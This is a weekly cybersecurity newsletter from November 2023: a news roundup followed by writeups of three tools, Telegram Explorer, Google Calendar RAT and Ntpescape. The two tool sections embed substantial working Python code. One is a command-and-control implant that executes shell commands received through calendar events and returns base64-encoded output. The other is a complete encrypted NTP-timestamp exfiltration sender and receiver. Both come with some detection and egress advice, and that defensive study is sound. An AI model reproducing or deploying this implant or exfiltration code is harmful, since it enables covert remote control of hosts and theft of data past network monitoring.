Week 45, November 6-12, 2023
Cybersecurity Weekly Updates.
This week in the world of cybersecurity:
A new version of the Jupyter Infostealer is circulating with improved stealth techniques. QNAP has released patches for critical flaws in its products. Android users should be cautious: SecuriDropper slips past Google's safeguards. Iranian hackers have been carrying out attacks on Israeli technology and education targets. Google has warned that its Calendar service could be misused by attackers. On the international front, the U.S. Treasury has sanctioned a money launderer tied to Russian cybercrime.
North Korean hackers are targeting macOS with BlueNoroff malware. A new GootLoader variant is hard to detect and spreading quickly. A concerning report finds that confidence in file upload security is declining. SideCopy is exploiting the WinRAR flaw in attacks on the Indian government. Ransomware experts warn that attackers are targeting Atlassian and Apache flaws. Veeam ONE users need to patch critical flaws.
Crypto mining is getting stealthier, including on platforms such as Azure Automation. WhatsApp users get good news: a new feature hides your IP address during calls. Developers should watch for the BlazeStealer malware hidden in Python packages on PyPI. In ransomware news, the inner workings of the Farnetwork operation have been exposed.
A zero-day alert has been issued for SysAid IT software, and a new malvertising campaign is impersonating a Windows news portal. Iranian hackers are also using a new C2 framework against Israel. CISA has warned that a high-severity SLP vulnerability is now being exploited. Russia's Sandworm group has caused a power outage in Ukraine.
Even after Atlassian Confluence servers are patched, the 'Effluence' backdoor persists. Tech sectors across the Middle East are the latest target of the Iran-linked Imperial Kitten group. The stealthy Kamran spyware is aimed at Urdu-speaking users. Finally, Microsoft warns of fake IT job assessment portals that target job seekers.
Recent Tools and Techniques
These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.
Telegram Explorer (TEx) is a tool for collecting and analysing data from Telegram groups that may be involved in illegal activity. It is aimed at researchers, investigators, and law enforcement personnel. TEx provides a connection manager, a group information scraper, and the ability to list groups. It supports automatic syncing of group and user information, a message listener, a message scraper, media download, HTML report generation, and export of both downloaded files and messages. It runs on Python 3.8.1 or higher (3.10+ recommended) on Windows x64 and Linux x64. The project is currently in beta, and users are encouraged to report bugs through its GitHub issues page.
Google Calendar RAT (GCR) is a proof-of-concept (PoC) tool that establishes a command and control (C2) channel over Google Calendar events. It allows remote command execution without a full red team infrastructure; a Google account is all that is needed. The tool uses the event description field to pass commands to the target and results back, creating a covert channel. Because the traffic is ordinary Google Calendar API traffic to Google servers, it blends in with legitimate activity and is hard to spot at the network level. To use GCR, the operator sets up a Google service account, obtains its credentials.json file, and creates a Google Calendar shared with that service account. Commands are scheduled as calendar events, with a unique identifier in the title and the command in the description; the implant polls for new events, executes the command, and writes the output back into the same description as a base64-encoded string, which the operator then reads from the event.
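The exchange described above, as an added example that is not the GCR project's own code: both sides of the channel run against an in-memory stand-in for the Calendar events API so it works offline (the real tool talks to the Google Calendar API with the service account's credentials.json). The "GCR:" title tag and the "OUT:" description prefix are this example's own conventions, not necessarily GCR's. The defender-side heuristic at the end is also an addition: given exported calendar events, it flags descriptions that carry a long, strictly valid base64 blob decoding to text.

```python
import base64
import re
import subprocess
import uuid
from dataclasses import dataclass


@dataclass
class Event:
    title: str
    description: str


class FakeCalendar:
    """In-memory stand-in for the Calendar events API (assumption: only insert,
    list and patch of the title/description fields are needed for the channel)."""

    def __init__(self):
        self.events = {}  # event id -> Event

    def insert(self, title, description):
        event_id = uuid.uuid4().hex
        self.events[event_id] = Event(title, description)
        return event_id

    def list(self):
        return list(self.events.items())

    def patch(self, event_id, description):
        self.events[event_id].description = description


TITLE_TAG = "GCR:"   # hypothetical convention: title = TITLE_TAG + implant id
OUT_PREFIX = "OUT:"  # hypothetical convention: description holds base64 output once answered


def operator_queue(cal, implant_id, command):
    """Operator side: schedule a command for one implant as a new event."""
    return cal.insert(title=TITLE_TAG + implant_id, description=command)


def run_shell(command):
    """Default executor: run the command through the local shell."""
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def implant_poll(cal, implant_id, run=run_shell):
    """Implant side: execute every unanswered event addressed to us and
    overwrite its description with the base64-encoded output."""
    answered = []
    for event_id, ev in cal.list():
        if ev.title != TITLE_TAG + implant_id or ev.description.startswith(OUT_PREFIX):
            continue
        output = run(ev.description)
        cal.patch(event_id, OUT_PREFIX + base64.b64encode(output.encode()).decode())
        answered.append(event_id)
    return answered


def operator_collect(cal, event_id):
    """Operator side: read the output back, or None if the implant has not polled yet."""
    desc = cal.events[event_id].description
    if not desc.startswith(OUT_PREFIX):
        return None
    return base64.b64decode(desc[len(OUT_PREFIX):]).decode()


B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def looks_like_c2_event(ev):
    """Defender-side heuristic for exported calendar data: flag events whose
    description carries a long, strictly valid base64 blob that decodes to text.
    Human-written descriptions almost never do; treat a hit as a lead, not proof."""
    for token in B64_TOKEN.findall(ev.description):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return True
    return False


def demo():
    """Full round trip: queue, poll/execute, collect. Events are constructed sample data."""
    cal = FakeCalendar()
    cal.insert("Lunch with Bob", "Thai place on 5th, 12:30")  # benign event, constructed
    event_id = operator_queue(cal, "host-1", "echo gcr-demo-output-line-one")
    assert operator_collect(cal, event_id) is None  # nothing until the implant polls
    implant_poll(cal, "host-1")
    return operator_collect(cal, event_id)


if __name__ == "__main__":
    print(repr(demo()))
```

The `run` parameter exists so the polling logic can be exercised without touching the shell; `demo()` uses the real executor. On the defensive side, the useful signal is not the network (it is legitimate Google traffic) but the data itself: service-account access to a calendar, and event descriptions that are machine-generated blobs rather than text, are both visible in Workspace audit and export data.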
Ntpescape is an NTP exfiltration tool for moving data discreetly over the Network Time Protocol (NTP). It hides the data in the low-order bits of the timestamps in NTP client packets, where the values are naturally unpredictable. The content is encrypted with a key specific to each sender and receiver pair, so the hidden bits look random and cannot be read by a third party. The receiver's responses mimic those of a real NTP server, with believable timestamps and updates, which makes the exchange hard for an intrusion detection system (IDS) to single out. The tool also supports reliable transfer, with packet retransmission and realistic spacing between requests that mirrors normal NTP client behaviour. Since the channel only works if the client can reach the attacker's receiver on UDP/123, restricting outbound NTP to approved servers closes it regardless of how convincing the packets look.
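The packet-level mechanism described above, as an added example that is not Ntpescape's own code. Assumptions made here: each 48-byte NTPv4 client request carries two payload bytes in the low 16 bits of the transmit-timestamp fraction; the per-pair key drives a SHA-256 keystream (a simplified stand-in for the tool's cipher, present only so the hidden bits look random); messages are framed with a 2-byte length; requests are spaced 64 seconds apart like a typical client poll interval; and the receiver answers as a stratum-2 server with the client's transmit timestamp echoed in the originate field, as a real server would.

```python
import hashlib
import struct
import time

NTP_UNIX_OFFSET = 2208988800  # seconds from the NTP epoch (1900) to the Unix epoch (1970)
CHUNK = 2                     # payload bytes hidden per request (assumption: low 16 fraction bits)
PACKET_LEN = 48


def keystream(key, counter):
    """Per-packet keystream SHA-256(key || counter); a stand-in for the tool's per-pair cipher."""
    return hashlib.sha256(key + counter.to_bytes(4, "big")).digest()[:CHUNK]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def ntp_timestamp(unix_time):
    """Split a Unix time into the 32-bit seconds and 32-bit fraction of an NTP timestamp."""
    seconds = int(unix_time) + NTP_UNIX_OFFSET
    fraction = int((unix_time - int(unix_time)) * (1 << 32)) & 0xFFFFFFFF
    return seconds, fraction


def transmit_timestamp(packet):
    """Return (seconds, fraction) of the transmit timestamp (bytes 40..47) of any NTP packet."""
    return struct.unpack("!II", packet[40:48])


def build_client_request(payload, key, counter, now=None):
    """Sender: an ordinary-looking NTPv4 client request whose transmit-timestamp
    fraction has its low 16 bits replaced by one encrypted payload chunk."""
    assert len(payload) == CHUNK
    secs, frac = ntp_timestamp(time.time() if now is None else now)
    hidden = int.from_bytes(xor(payload, keystream(key, counter)), "big")
    frac = (frac & ~0xFFFF) | hidden
    header = struct.pack("!BBbb", (0 << 6) | (4 << 3) | 3, 0, 0, 0)  # LI=0, VN=4, mode=3 (client)
    body = b"\x00" * 12   # root delay, root dispersion, reference id
    body += b"\x00" * 24  # reference, originate, receive timestamps: zero, as real clients send
    body += struct.pack("!II", secs, frac)  # transmit timestamp carries the chunk
    return header + body


def extract_chunk(packet, key, counter):
    """Receiver: pull the chunk out of a client request and decrypt it."""
    if len(packet) != PACKET_LEN or packet[0] & 0x07 != 3:
        raise ValueError("not a 48-byte NTP client request")
    _, frac = transmit_timestamp(packet)
    return xor((frac & 0xFFFF).to_bytes(CHUNK, "big"), keystream(key, counter))


def build_server_reply(request, now=None):
    """Receiver: answer like a real stratum-2 server (mode 4), echoing the client's
    transmit timestamp as the originate timestamp so the exchange looks legitimate."""
    secs, frac = ntp_timestamp(time.time() if now is None else now)
    stamp = struct.pack("!II", secs, frac)
    header = struct.pack("!BBbb", (0 << 6) | (4 << 3) | 4, 2, 6, -20)  # mode 4, stratum 2
    body = struct.pack("!II4s", 0, 0x10, b"GPS\x00")  # root delay, root dispersion, ref id
    return header + body + stamp + request[40:48] + stamp + stamp


def send_message(message, key, start_time=None):
    """Frame a message as [2-byte length][data][zero pad] and emit one request per chunk,
    spaced 64 s apart to mimic a normal client's poll interval."""
    framed = len(message).to_bytes(CHUNK, "big") + message
    framed += b"\x00" * (-len(framed) % CHUNK)
    t = time.time() if start_time is None else start_time
    packets = []
    for i in range(0, len(framed), CHUNK):
        n = i // CHUNK
        packets.append(build_client_request(framed[i:i + CHUNK], key, n, now=t + 64 * n))
    return packets


def receive_message(packets, key):
    """Reassemble the chunks in arrival order and strip the length framing."""
    data = b"".join(extract_chunk(p, key, i) for i, p in enumerate(packets))
    length = int.from_bytes(data[:CHUNK], "big")
    return data[CHUNK:CHUNK + length]


if __name__ == "__main__":
    key = b"shared-pair-key"  # constructed sample key
    requests = send_message(b"secret", key)
    print(len(requests), "requests;", receive_message(requests, key))
    print(build_server_reply(requests[0]).hex())
```

The upper fraction bits still carry the real sub-second time, so the timestamps stay plausible; only the low 16 bits, which are clock noise in a legitimate client anyway, are overwritten. That is why there is no reliable per-packet signature: detection has to come from context (NTP requests to a host that is not an approved time server, unusual request volumes, or packets leaving through egress that should only permit the internal NTP pool).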
That's a wrap on this week's edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defence. Hopefully the insights shared today will help you navigate this complex domain and strengthen your defences against potential threats. Stay vigilant, stay informed, and look out for more insights into the world of cyber-security in next week's edition.
To keep up with the weekly cyber-security roundups, subscribe to the newsletter and follow on social media. If you have questions or specific topics you'd like to see covered, don't hesitate to get in touch.